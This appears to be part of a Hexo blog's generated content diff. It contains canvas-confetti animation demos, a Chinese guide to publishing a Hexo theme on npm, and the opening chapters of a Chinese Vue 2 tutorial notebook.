    function Fireworks() {
    var duration = 15 * 1000;
    var animationEnd = Date.now() + duration;
    var defaults = { startVelocity: 30, spread: 360, ticks: 60, zIndex: 0 };

    function randomInRange(min, max) {
    return Math.random() * (max - min) + min;
    }

    var interval = setInterval(function () {
    var timeLeft = animationEnd - Date.now();

    if (timeLeft <= 0) {
    return clearInterval(interval);
    }

    var particleCount = 50 * (timeLeft / duration);
    // since particles fall down, start a bit higher than random
    confetti({ ...defaults, particleCount, origin: { x: randomInRange(0.1, 0.3), y: Math.random() - 0.2 } });
    confetti({ ...defaults, particleCount, origin: { x: randomInRange(0.7, 0.9), y: Math.random() - 0.2 } });
    }, 250);
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    function Stars() {
    var defaults = {
    spread: 360,
    ticks: 50,
    gravity: 0,
    decay: 0.94,
    startVelocity: 30,
    colors: ['FFE400', 'FFBD00', 'E89400', 'FFCA6C', 'FDFFB8']
    };

    function shoot() {
    confetti({
    ...defaults,
    particleCount: 40,
    scalar: 1.2,
    shapes: ['star']
    });

    confetti({
    ...defaults,
    particleCount: 10,
    scalar: 0.75,
    shapes: ['circle']
    });
    }

    setTimeout(shoot, 0);
    setTimeout(shoot, 100);
    setTimeout(shoot, 200);
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    function Snow() {
    var duration = 15 * 1000;
    var animationEnd = Date.now() + duration;
    var skew = 1;

    function randomInRange(min, max) {
    return Math.random() * (max - min) + min;
    }

    (function frame() {
    var timeLeft = animationEnd - Date.now();
    var ticks = Math.max(200, 500 * (timeLeft / duration));
    skew = Math.max(0.8, skew - 0.001);

    confetti({
    particleCount: 1,
    startVelocity: 0,
    ticks: ticks,
    origin: {
    x: Math.random(),
    // since particles fall down, skew start toward the top
    y: (Math.random() * skew) - 0.2
    },
    colors: ['#ffffff'],
    shapes: ['circle'],
    gravity: randomInRange(0.4, 0.6),
    scalar: randomInRange(0.4, 1),
    drift: randomInRange(-0.4, 0.4)
    });

    if (timeLeft > 0) {
    requestAnimationFrame(frame);
    }
    }());
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    function SchoolPride() {
    var end = Date.now() + (15 * 1000);

    // go Buckeyes!
    var colors = ['#bb0000', '#ffffff'];

    (function frame() {
    confetti({
    particleCount: 2,
    angle: 60,
    spread: 55,
    origin: { x: 0 },
    colors: colors
    });
    confetti({
    particleCount: 2,
    angle: 120,
    spread: 55,
    origin: { x: 1 },
    colors: colors
    });

    if (Date.now() < end) {
    requestAnimationFrame(frame);
    }
    }());
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    function CustomShapes() {
    // note: you CAN only use a path for confetti.shapeFrompath(), but for
    // performance reasons it is best to use it once in development and save
    // the result to avoid the performance penalty at runtime

    // pumpkin shape from https://thenounproject.com/icon/pumpkin-5253388/
    var pumpkin = confetti.shapeFromPath({
    path: 'M449.4 142c-5 0-10 .3-15 1a183 183 0 0 0-66.9-19.1V87.5a17.5 17.5 0 1 0-35 0v36.4a183 183 0 0 0-67 19c-4.9-.6-9.9-1-14.8-1C170.3 142 105 219.6 105 315s65.3 173 145.7 173c5 0 10-.3 14.8-1a184.7 184.7 0 0 0 169 0c4.9.7 9.9 1 14.9 1 80.3 0 145.6-77.6 145.6-173s-65.3-173-145.7-173zm-220 138 27.4-40.4a11.6 11.6 0 0 1 16.4-2.7l54.7 40.3a11.3 11.3 0 0 1-7 20.3H239a11.3 11.3 0 0 1-9.6-17.5zM444 383.8l-43.7 17.5a17.7 17.7 0 0 1-13 0l-37.3-15-37.2 15a17.8 17.8 0 0 1-13 0L256 383.8a17.5 17.5 0 0 1 13-32.6l37.3 15 37.2-15c4.2-1.6 8.8-1.6 13 0l37.3 15 37.2-15a17.5 17.5 0 0 1 13 32.6zm17-86.3h-82a11.3 11.3 0 0 1-6.9-20.4l54.7-40.3a11.6 11.6 0 0 1 16.4 2.8l27.4 40.4a11.3 11.3 0 0 1-9.6 17.5z',
    matrix: [0.020491803278688523, 0, 0, 0.020491803278688523, -7.172131147540983, -5.9016393442622945]
    });
    // tree shape from https://thenounproject.com/icon/pine-tree-1471679/
    var tree = confetti.shapeFromPath({
    path: 'M120 240c-41,14 -91,18 -120,1 29,-10 57,-22 81,-40 -18,2 -37,3 -55,-3 25,-14 48,-30 66,-51 -11,5 -26,8 -45,7 20,-14 40,-30 57,-49 -13,1 -26,2 -38,-1 18,-11 35,-25 51,-43 -13,3 -24,5 -35,6 21,-19 40,-41 53,-67 14,26 32,48 54,67 -11,-1 -23,-3 -35,-6 15,18 32,32 51,43 -13,3 -26,2 -38,1 17,19 36,35 56,49 -19,1 -33,-2 -45,-7 19,21 42,37 67,51 -19,6 -37,5 -56,3 25,18 53,30 82,40 -30,17 -79,13 -120,-1l0 41 -31 0 0 -41z',
    matrix: [0.03597122302158273, 0, 0, 0.03597122302158273, -4.856115107913669, -5.071942446043165]
    });
    // heart shape from https://thenounproject.com/icon/heart-1545381/
    var heart = confetti.shapeFromPath({
    path: 'M167 72c19,-38 37,-56 75,-56 42,0 76,33 76,75 0,76 -76,151 -151,227 -76,-76 -151,-151 -151,-227 0,-42 33,-75 75,-75 38,0 57,18 76,56z',
    matrix: [0.03333333333333333, 0, 0, 0.03333333333333333, -5.566666666666666, -5.533333333333333]
    });

    var defaults = {
    scalar: 2,
    spread: 180,
    particleCount: 30,
    origin: { y: -0.1 },
    startVelocity: -35
    };

    confetti({
    ...defaults,
    shapes: [pumpkin],
    colors: ['#ff9a00', '#ff7400', '#ff4d00']
    });
    confetti({
    ...defaults,
    shapes: [tree],
    colors: ['#8d960f', '#be0f10', '#445404']
    });
    confetti({
    ...defaults,
    shapes: [heart],
    colors: ['#f93963', '#a10864', '#ee0b93']
    });
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    function Emoji() {
    var scalar = 2;
    var unicorn = confetti.shapeFromText({ text: text, scalar });

    var defaults = {
    spread: 360,
    ticks: 60,
    gravity: 0,
    decay: 0.96,
    startVelocity: 20,
    shapes: [unicorn],
    scalar
    };

    function shoot() {
    confetti({
    ...defaults,
    particleCount: 30
    });

    confetti({
    ...defaults,
    particleCount: 5,
    flat: true
    });

    confetti({
    ...defaults,
    particleCount: 15,
    scalar: scalar / 2,
    shapes: ['circle']
    });
    }

    setTimeout(shoot, 0);
    setTimeout(shoot, 100);
    setTimeout(shoot, 200);
    }

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    function CustomCanvas(id) {
    var canvas = document.getElementById(id);

    // you should only initialize a canvas once, so save this function
    // we'll save it to the canvas itself for the purpose of this demo
    canvas.confetti = canvas.confetti || confetti.create(canvas, { resize: true });

    canvas.confetti({
    spread: 70,
    origin: { y: 1.2 }
    });
    }


    ]]>
    @@ -195,7 +195,7 @@ /posts/Web-%E5%8F%91%E5%B8%83%E4%B8%80%E4%B8%AA%E5%8C%85%E5%88%B0%20npm/ - 正文

    登录

    ​去 npm 官网整一个账号。

    ​先更新一下:

    npm install -g npm@latest

    ​把镜像站关了:

    npm config set registry https://registry.npmjs.org/

    ​尝试登陆:

    npm init
    npm notice Log in on https://registry.npmjs.org/
    Login at:
    https://www.npmjs.com/login?next=/login/cli/XXX
    Press ENTER to open in the browser...

    ​在浏览器中登录后,完成。

    项目工程

    ​做好项目工程,在 github 上整一个仓库:GZ-Metal-Cell/hexo-theme-quieter: 🍓 A simple and fully functional Hexo theme, improved based on Hexo theme quiet.

    创建包

    ​在项目工程文件夹下使用 npm init -y 来自动生成一个默认的 package.json 文件。

    ​一阵操作:

    {
    "name": "hexo-theme-quieter",
    "version": "1.0.0",
    "description": "🍓A simple and fully functional Hexo theme, improved based on Hexo theme quiet.",
    "main": "package.json",
    "scripts": {
    "test": "echo test"
    },
    "repository": {
    "type": "git",
    "url": "git+https://github.com/GZ-Metal-Cell/hexo-theme-quieter.git"
    },
    "keywords": [
    "hexo",
    "hexo-theme",
    "theme",
    "quieter",
    "simple"
    ],
    "author": "Gz-Metal-Cell",
    "license": "MIT",
    "bugs": {
    "url": "https://github.com/GZ-Metal-Cell/hexo-theme-quieter/issues"
    },
    "homepage": "https://github.com/GZ-Metal-Cell/hexo-theme-quieter#readme",
    "devDependencies": {
    "hexo": "^6.1.0",
    "hexo-renderer-ejs": "^2.0.0",
    "hexo-renderer-less": "^4.0.0",
    "crypto-js": "^4.2.0"
    }
    }

    发布包

    npm publish

    发布后管理

    • 可以通过 npm 官网 访问和管理你的包。
    • 若想更新版本,可以在代码更改后再次更新 package.json 里的版本号,并使用 npm publish 发布新版本。
      • 如果你需要更新已发布的包,只需修改代码、更新版本号,然后再次执行 npm publish 即可。请确保版本号与之前不同,否则 npm 会拒绝发布。
    ]]>
    + 正文

    登录

    ​去 npm 官网整一个账号。

    ​先更新一下:

    1
    npm install -g npm@latest

    ​把镜像站关了:

    1
    npm config set registry https://registry.npmjs.org/

    ​尝试登陆:

    1
    npm init
    1
    2
    3
    4
    npm notice Log in on https://registry.npmjs.org/
    Login at:
    https://www.npmjs.com/login?next=/login/cli/XXX
    Press ENTER to open in the browser...

    ​在浏览器中登录后,完成。

    项目工程

    ​做好项目工程,在 github 上整一个仓库:GZ-Metal-Cell/hexo-theme-quieter: 🍓 A simple and fully functional Hexo theme, improved based on Hexo theme quiet.

    创建包

    ​在项目工程文件夹下使用 npm init -y 来自动生成一个默认的 package.json 文件。

    ​一阵操作:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    {
    "name": "hexo-theme-quieter",
    "version": "1.0.0",
    "description": "🍓A simple and fully functional Hexo theme, improved based on Hexo theme quiet.",
    "main": "package.json",
    "scripts": {
    "test": "echo test"
    },
    "repository": {
    "type": "git",
    "url": "git+https://github.com/GZ-Metal-Cell/hexo-theme-quieter.git"
    },
    "keywords": [
    "hexo",
    "hexo-theme",
    "theme",
    "quieter",
    "simple"
    ],
    "author": "Gz-Metal-Cell",
    "license": "MIT",
    "bugs": {
    "url": "https://github.com/GZ-Metal-Cell/hexo-theme-quieter/issues"
    },
    "homepage": "https://github.com/GZ-Metal-Cell/hexo-theme-quieter#readme",
    "devDependencies": {
    "hexo": "^6.1.0",
    "hexo-renderer-ejs": "^2.0.0",
    "hexo-renderer-less": "^4.0.0",
    "crypto-js": "^4.2.0"
    }
    }

    发布包

    1
    npm publish

    发布后管理

    • 可以通过 npm 官网 访问和管理你的包。
    • 若想更新版本,可以在代码更改后再次更新 package.json 里的版本号,并使用 npm publish 发布新版本。
      • 如果你需要更新已发布的包,只需修改代码、更新版本号,然后再次执行 npm publish 即可。请确保版本号与之前不同,否则 npm 会拒绝发布。
    ]]>
    @@ -220,7 +220,7 @@ /posts/Web-Vue%EF%BC%88Vue%20%E6%A0%B8%E5%BF%83%EF%BC%89/ - 资源

    目录

    1. Vue 核心
    2. Vue 组件化编程
    3. 使用 Vue 脚手架
    4. Vue 中的 ajax
    5. vuex
    6. vue-router
    7. Vue UI 组件库

    正文

    一、初识 Vue

    001 课程简介

    Vue2(4 年、70+ 更新)→Vue3(未来趋势)

    Vue:

    • vue 基础
    • vue-cli
    • vue-router
    • vuex
    • element-ui
    • vue3

    002 Vue 简介

    Vue 是什么?

    一套用于构建用户界面渐进式 Javascript 框架。

    构建用户界面:将后端的数据转换为界面(DOM)显示

    **渐进式:**Vue 可以自底向上逐层的应用

    • 简单应用:只需一个轻量小巧的核心库
    • 复杂应用:可以引入各式各样的 Vue 插件

    谁开发的?

    ​尤雨溪:yyx990803 (Evan You)

    年份描述
    2013 年受到 Angular 框架的启发,尤雨溪开发出了一款轻量框架 - Seed。
    同年 12 月,Seed 更名为 Vue,版本号 0.6.0。
    2014 年Vue 正式对外发布,版本号0.8.0
    Taylor otwel 在 Twitter 上发表动态,说自己正在学习 Vue.js
    2015 年10 月 27 日,正式发布 Vue 1.0.0 Evangelion(新世纪福音战士)
    2016 年10 月 1 日,正式发布 Vue 2.0.0 Ghostin the Shell(攻壳机动队)
    2020 年9 月 18 日,正式发布 Vue 3.0.0 One Piece(海贼王)

    ​后起之秀,生态完善,已然成为国内前端工程师必备技能。

    Vue 的特点

    • 采用组件化模式,提高代码复用率、且让代码更好维护。

    webp

    ​像网页中的各个组件的 DOM,用对应的 vue 文件来表示,vue 中集成了 Html、CSS、JS 中的内容。各个组件不会互相影响。

    数据(persons)

    [
    {id: '001',name: '张三',age: 18},
    {id:'002',name:'李四',age:19},
    {id:'003',name:'王五',age:20}
    ]

    容器(DOM)

    <ul id="list"></ul>

    效果

    • 001 - 张三 - 18
    • 002 - 李四 - 19
    • 003 - 王五 - 20
    • 声明式编码,让编码人员无需直接操作 DOM,提高开发效率。

    命令式编码

    // 准备 html 字符串
    let htmlStr ='
    // 遍历数据拼接 htm1 字符串
    persons.forEach(p=>{
    htmlstr +=`<li>${p.id}-${p.name}-${p.age}</li>`
    });
    // 获取 list 元素
    let list = document.getElementById('list')
    // 修改内容(亲自操作 DOM)
    list.innerHTML = htmlstr

    声明式编码

    <ul id="list">
    <li v-for="p in persons">
    {{p.id}}-{{p.name}}-{{p.age}}
    </li>
    </ul>
    • 使用虚拟 DOM+优秀的 Diff 算法,尽量复用 DOM 节点。

    原生 Javascript 实现将数据转换为视图:

    <!-- 展示人员列表的容器 -->
    <ul id="list"></ul>

    <script type="text/javascript">
    // 一些人的数据
    let persons = [
    {id:'001', name:'张三', age:18},
    {id:'002', name:'李四', age:19},
    {id:'03', name:'王五', age:20}
    ]

    // 准备 html 字符串
    let htmlStr = ''

    // 遍历数据拼接 html 字符串
    persons.forEach(p =>{
    htmlstr +=`<li>${p.id}-${p.name}-${p.age}</li>`
    });

    //获取 list 元素
    let list = document.getElementById('list')

    //修改内容(亲自操作 DOM)
    list.innerHTML = htmlstr
    </script>

    得到:

    • 001 - 张三 - 18
    • 002 - 李四 - 19
    • 003 - 王五 - 20

    webp

    ​原生 JavaScript 直接将数据转化到页面真实 DOM(Real-DOM)。如果数据有更新,需要重新渲染整个 DOM。

    webp

    ​Vue 引入了虚拟 DOM(Virtual-DOM)的概念。

    ​在 Vue 中,Diff(全称:差异算法)是指在更新视图时,Vue 通过对比新旧虚拟 DOM(Virtual DOM)树,计算出最小的变化差异,并通过这些差异来更新真实的 DOM。

    1. 虚拟DOM的概念

    ​虚拟 DOM(Virtual DOM)是 Vue 用来提高性能的一种技术。它通过在内存中创建一棵与实际 DOM 结构相对应的虚拟 DOM 树,然后在数据变化时,只对比新旧虚拟 DOM 的差异,最终只将最小的差异更新到真实的 DOM 中,而不是每次数据变化时都重新渲染整个 DOM。

    2. Diff 算法的过程

    ​当组件的状态或数据发生变化时,Vue 会生成新的虚拟 DOM,并与旧的虚拟DOM 进行对比。这个对比的过程就是 Diff 算法的核心。Diff 算法的主要目标是通过高效的方式找出新旧虚拟 DOM 树的差异,并最小化 DOM 更新的开销。

    ​具体的 Diff 步骤可以分为以下几个关键过程:

    • 节点类型比较:Vue 会首先判断新旧节点是否是同一个类型。如果是同类型节点,继续对子节点进行比较;如果不是同类型节点,直接替换整个节点。
    • 属性比较:对于同类型的节点,Vue 会逐一比较它们的属性(如 classstyle 等)。只有当属性发生变化时,Vue 才会更新这些属性。
    • 子节点比较:Vue 使用一些优化策略来比较子节点。比如它会在相同的父节点下,使用一个双指针的方式(前后两个指针分别指向新旧子节点),通过遍历来找出差异,避免不必要的遍历。
    • Key 的使用:Vue 建议在列表渲染时为每个子元素添加一个 key,这样可以帮助 Vue 更高效地定位元素,减少不必要的重排和重绘。

    3. Diff 算法的优化

    Vue 中的 Diff 算法是经过优化的,主要通过以下几点提高性能:

    • 最小化比较范围:在树的同一层级内,Vue 通过双指针的方式来比较子节点,而不是完全重新遍历所有子节点。
    • 跳过不必要的更新:如果新旧节点内容完全相同,Vue 会跳过这个节点的更新。
    • 分层更新:Vue 会优先更新那些改变了的节点,而不需要重新渲染整个树。

    4. 为什么需要 Diff 算法

    ​DOM 操作通常是非常耗费性能的,尤其是在数据频繁变化的场景中。Vue 通过使用虚拟 DOM 和 Diff 算法,能够显著减少不必要的 DOM 操作,从而提升性能。

    学习 Vue 之前要掌握的 JavaScript 基础知识?

    ES6 语法规范

    ​ES6(ECMAScript 2015)是 JavaScript 的一个重要更新版本,它带来了许多新的语法特性,能使代码更加简洁和高效。主要包括:

    • let 和 constlet 用于声明可变的变量,const 用于声明常量。
    • 箭头函数:简化函数书写,并且箭头函数的 this 绑定是词法作用域,而非动态绑定。
    const add = (a, b) => a + b;
    • 模板字符串:允许使用 ${} 插入变量,使字符串拼接更加直观。
    let name = "Vue";
    console.log(`Welcome to ${name}`);
    • 解构赋值:可以快速从数组或对象中提取值,并赋予变量。
    const [a, b] = [1, 2]; // 解构数组
    const { name, age } = { name: "Alice", age: 25 }; // 解构对象
    • 默认参数:函数参数可以设置默认值。
    function greet(name = "Guest") {
    console.log(`Hello, ${name}!`);
    }
    • 扩展运算符(spread/rest):简化数组和对象的操作。
    let arr = [1, 2, 3];
    let newArr = [...arr, 4, 5]; // 扩展数组

    const obj = { a: 1, b: 2 };
    const newObj = { ...obj, c: 3 }; // 扩展对象
    ES6 模块化

    ​ES6 引入了模块化机制,通过 importexport 使得代码更易维护和重用。模块化的关键:

    • 导出:模块中可以通过 export 导出变量、函数或类。
    // person.js
    export const name = 'Alice';
    export function greet() {
    console.log("Hello!");
    }
    • 导入:其他模块通过 import 来使用导出的内容。
    // app.js
    import { name, greet } from './person.js';
    greet();
    console.log(name);
    包管理器

    ​在现代 JavaScript 开发中,包管理器(如 npmyarn)用于管理项目中的依赖包,安装、更新、卸载模块。

    • npm(Node Package Manager):是 Node.js 默认的包管理器,帮助开发者下载并管理第三方库和工具。
    npm init -y      # 初始化一个新的 package.json 文件
    npm install vue # 安装 Vue.js 库
    npm install # 安装项目中的所有依赖
    • yarn:是 Facebook 推出的包管理工具,相比 npm 在性能和并发性上有些优化。
    yarn init         # 初始化项目
    yarn add vue # 安装 Vue.js 库
    yarn install # 安装项目依赖
    原型与原型链

    ​JavaScript 是基于原型的语言,每个对象都有一个 prototype 属性,指向其原型对象。原型链是通过对象的 prototype 属性连接起来的链式结构。通过原型链可以实现继承。

    • 原型:每个函数都有一个 prototype 属性,用于定义该函数创建的对象的共享属性和方法。
    function Person(name) {
    this.name = name;
    }

    Person.prototype.sayHello = function() {
    console.log("Hello, " + this.name);
    };

    const person = new Person('John');
    person.sayHello(); // Hello, John
    • 原型链:对象通过 __proto__ 访问原型,从而实现继承。
    const obj = { name: 'Vue' };
    console.log(obj.__proto__); // 访问 obj 的原型对象
    数组常用方法

    ​在日常开发中,JavaScript 数组的方法非常重要。以下是一些常用的数组方法:

    • map():返回一个新数组,数组中的每个元素都经过回调函数处理。
    const arr = [1, 2, 3];
    const result = arr.map(x => x * 2); // [2, 4, 6]
    • filter():返回一个新数组,包含所有通过条件测试的元素。
    const arr = [1, 2, 3, 4];
    const result = arr.filter(x => x > 2); // [3, 4]
    • reduce():通过回调函数将数组值汇总为单一的值。
    const arr = [1, 2, 3];
    const sum = arr.reduce((acc, curr) => acc + curr, 0); // 6
    • forEach():对数组的每个元素执行一个回调函数,不返回新数组。
    const arr = [1, 2, 3];
    arr.forEach(x => console.log(x)); // 输出 1, 2, 3
    Axios

    Axios 是一个基于 Promise 的 HTTP 客户端,用于浏览器和 Node.js。它常用于向后端 API 发起请求。

    • 发送 GET 请求
    axios.get('https://api.example.com/data')
    .then(response => {
    console.log(response.data);
    })
    .catch(error => {
    console.error(error);
    });
    • 发送 POST 请求
    axios.post('https://api.example.com/data', { name: 'Vue' })
    .then(response => {
    console.log(response.data);
    })
    .catch(error => {
    console.error(error);
    });
    Promise

    Promise 是 JavaScript 中用于处理异步操作的对象,它有三种状态:pending(等待中)、resolved(已完成)、rejected(已拒绝)。

    • 创建 Promise
    const promise = new Promise((resolve, reject) => {
    let success = true;
    if (success) {
    resolve('Success!');
    } else {
    reject('Failed!');
    }
    });
    • 使用 .then().catch()
    promise
    .then(result => console.log(result)) // Success!
    .catch(error => console.log(error)); // Failed!
    • 链式调用
    new Promise((resolve, reject) => {
    resolve(1);
    })
    .then(value => value + 2)
    .then(value => value * 3)
    .then(value => console.log(value)); // 9

    003 Vue 官网使用指南

    004 搭建 Vue 开发环境

    ​从 安装 — Vue.js 获取 Vue2 的代码,得到文件:vue.js(开发版本,包含完整的警告和调试模式) 和 vue.min.js(上线时使用,删除了所有警告信息,体积更小)。

    webp

    ​将下载好的文件导入到项目中,如此组织项目中的文件。

    ​在 VSCode 下的空白 html 文件中,输入 ! 后再按 Tab 键即可快速生成模板,此后修改文件内容:

    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <!-- 引入 Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>
    </head>
    <body>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    </script>
    </body>
    </html>

    ​安装 Vue DevTools 便于开发者调试:Vue.js devtools - Microsoft Edge Addons

    ​此时 Vue 开发环境搭建完成。

    005-006 Hello 小案例 & 分析

    ​在 VSCode 中,输入 div#root 可以快速生成 <div id="root"></div>


    初识 Vue:

    1. 想让 Vue 工作,就必须创建一个 Vue 实例,且要传入一个配置对象;

    2. root 容器里的代码依然符合 html 规范,只不过混入了一些特殊的 Vue 语法;

    3. root 容器里的代码被称为 Vue 模板

    4. Vue 实例和容器是一一对应的;

    5. 真实开发中只有一个 Vue 实例,并且会配合着组件一起使用;

    6. {{}} 中的内容要写 js 表达式,且内容可以自动读取到 data 中的所有属性;

      注意区分 js 表达式和 js 代码(语句)

      • 表达式:一个表达式会产生一个值,可以放在任何一个需要值的地方:
        • a
        • a + b
        • demo(1)
        • x === y ? 'a' : 'b'
      • js 代码(语句)
        • if(){}
        • for(){}
    7. 一旦 data 中的数据发生改变,那么模板中用到该数据的地方也会自动更新

    <div id="root">
    <h1>Hello, {{name.toUpperCase()}}</h1>
    <h1>I'm {{age}} years old.</h1>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    new Vue({
    el: "#root", // el 用于指定当前 Vue 实例为哪个容器服务,值通常为 css 选择器字符串(类/id)。
    data: {
    name: 'Gul’dan',
    age: '18'
    }
    })
    </script>

    二、Vue 模板语法

    007 模板语法

    ​Vue 模板语法有两大类:

    1. 插值语法
      • 功能:用于解析标签体内容
      • 写法:{{xxx}},xxx 是 js 表达式,且可以直接读取到 data 中的所有属性。
    2. 指令语法
      • 功能:用于解析标签(包括:标签属性、标签体内容、绑定事件……)
      • 举例:v-bind:href="xxx" 或简写为 :href="xxx",xxx 同样要写 js 表达式,且可以直接读取到 data 中的所有属性。
      • 备注:Vue 中有很多的指令,且形式都是:v-????,此处我们只是拿 v-bind 举个例子。
    <div id="root">
    <h1>Hello, {{player.name}}</h1>
    <a :href="url">点击打开百度!</h1>
    <a v-bind:href="url">点击打开百度!</h1>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    new Vue({
    el: '#root',
    data: {
    player:{
    name: 'Gul’dan'
    },
    url: 'http://www.baidu.com'
    }
    })
    </script>

    三、数据绑定

    008 数据绑定

    Vue 中有两种数据绑定的方式:

    1. 单向绑定 v-bind:数据只能从 data 流向页面。

    2. 双向绑定 v-model:数据不仅能从 data 流向页面,还可以从页面流向 data。

      备注:

      • 双向绑定一般都**应用在表单类元素(输入类元素)**上(如:inputselect 等)
      • v-model:value 可以简写为 v-model,因为 v-model 默认收集的就是 value 值。
    <div id="root">
    单向数据绑定:<input type="text" :value="name"><br/>
    双向数据绑定:<input type="text" v-model:value="name"><br/>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    new Vue({
    el: '#root',
    data: {
    name: '123456'
    }
    })
    </script>

    webp

    ​修改上面输入框的值不会更改 Vue 实例中的 data;

    ​修改下面输入框的值会更改 Vue 实例中的 data,进而影响上面输入框的值。

    四、el 与 data 的两种写法

    009 el 与 data 的两种写法

    1. el 的两种写法

      • new Vue 时配置 el 属性。

      • 先创建 Vue 实例,随后再通过 vm.$mount('#root') 指定 el 的值。

    2. data 有两种写法

      • 对象式
      • 函数式

      如何选择:目前哪种写法都可以,以后学习到组件时,data 必须使用函数式,否则会报错。

      一个重要的原则:由 Vue 管理的函数,一定不要写箭头函数,一旦写了箭头函数,this 就不再是 Vue 实例了(而是 window)。

    <div id="root">
    <h1>你好,{{name}}</h1>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    data() {
    return {name: '古尔丹'}
    }
    })

    setTimeout(() => {
    v.$mount('#root')
    }, 1000)
    </script>

    五、MVVM 模型

    010 理解 MVVM

    ​在软件开发中,MVVM(Model-View-ViewModel) 是一种软件架构模式,广泛应用于前端开发,尤其是在以数据驱动的用户界面(UI)中,比如 WPF、Xamarin 和前端框架(如 Vue、Angular 等)。它通过将用户界面逻辑和业务逻辑进行分离,简化了应用的状态管理和数据绑定。MVVM 模式包含三个主要组件:

    1. Model(模型)
      Model 是应用程序的数据层,通常包含业务逻辑和数据结构。它负责从数据源(如数据库、API 等)获取数据,并提供相关的业务逻辑处理。
    2. View(视图)
      View 是用户界面层,负责显示数据和接收用户的交互。View 通常包含界面布局和样式文件,如 HTML 或 XAML。它的职责是呈现数据,但不负责逻辑处理。
    3. ViewModel(视图模型)
      ViewModel 充当 View 和 Model 之间的桥梁。它包含 UI 所需的数据和状态,监听用户的输入并更新 Model,同时将 Model 的数据转换成 View 可使用的形式。View 和 ViewModel 之间一般通过数据绑定来实现通信。

    MVVM 的关键特点

    • 双向数据绑定
      在 MVVM 中,View 和 ViewModel 之间的数据绑定是双向的:View 绑定到 ViewModel 的属性,ViewModel 的属性值改变时,View 会自动更新;反之,用户在 View 中的输入会更新 ViewModel 中的属性。这种双向绑定极大地减少了手动更新 UI 的需求。
    • 命令模式
      ViewModel 提供命令(Commands),由 View 绑定,用于处理用户的操作(如点击按钮)。通过命令,ViewModel 可以与业务逻辑进行交互,而无需让 View 直接处理事件。
    • 可测试性
      MVVM 模式使得 ViewModel 可以与 UI 分离,便于单元测试。因为 ViewModel 不直接依赖 View,可以在不使用 UI 的情况下进行逻辑测试。

    webp

    1. M:模型 (Model):对应 data 中的数据
    2. V:视图 (View):模板
    3. VM:视图模型 (ViewModel):Vue 实例对象

    webp

    观察发现:

    1. data 中所有的属性,最后都出现在了 vm 身上。
    2. vm 身上所有的属性及 Vue 原型上所有属性,在 Vue 模板中都可以直接使用。

    webp

    六、数据代理

    011 Object.defineProperty

    Object.defineProperty 是 JavaScript 中的一个方法,允许你精确控制对象属性的行为。它在定义或修改对象属性时提供了额外的控制,如设置属性的可枚举性、可配置性和可写性。与直接赋值方式不同,Object.defineProperty 可以定义“属性描述符”(property descriptors),包括数据描述符和访问器描述符。其基本语法如下:

    Object.defineProperty(obj, prop, descriptor)
    • 参数说明
      • obj:要在其上定义属性的对象。
      • prop:要定义或修改的属性名称(字符串)。
      • descriptor:描述属性行为的对象。
    • 属性描述符
      1. 数据描述符(Data Descriptor):包含值和一些标志,指定属性的行为。常见属性:
        • value:属性的值(默认是 undefined)。
        • writable:布尔值,表示属性是否可被赋值运算符修改(默认是 false)。
        • enumerable:布尔值,表示属性是否可枚举(即能否被 for...inObject.keys 枚举)(默认是 false)。
        • configurable:布尔值,表示属性描述符是否可以被删除或进一步修改(默认是 false)。
      2. 访问器描述符(Accessor Descriptor):定义 getter 和 setter 函数。
        • get:函数,作为属性的 getter(读取属性值时调用)。默认是 undefined
        • set:函数,作为属性的 setter(写入属性值时调用)。默认是 undefined
        • enumerableconfigurable:同数据描述符。

    ​在控制台中测试:

    let number = 18
    let person = {
    name: '张三',
    sex: '男',
    }

    Object.defineProperty(person, 'age', {
    // value: 18,
    // enumerable: true, // 控制属性是否可以枚举,默认值是 false
    // writable: true, //控制属性是否可以被修改,默认值是 false
    // configurable: true, //控制属性是否可以被删除,默认值是false

    // 当有人读取 person 的 age 属性时,get 函数 (getter) 就会被调用,且返回值就是 age 的值
    get() {
    console.log('有人读取 age 属性了')
    return number
    },

    // 当有人修改 person 的 age 属性时,set 函数 (setter) 就会被调用,且会收到修改的具体值
    set(value) {
    console.log('有人修改了 age 属性,且值是', value)
    number = value
    }
    })

    webp

    012 理解数据代理

    数据代理:通过一个对象代理对另一个对象中属性的操作(读/写)

    let obj = {x:100}
    let obj2 = {y:200}

    Object.defineProperty(obj2, 'x', {
    get() {
    return obj.x
    },
    set(value) {
    obj.x = value
    }
    })

    webp

    ​此时,修改 obj2.x 的值也会影响 obj.x 的值。

    013 Vue 中的数据代理

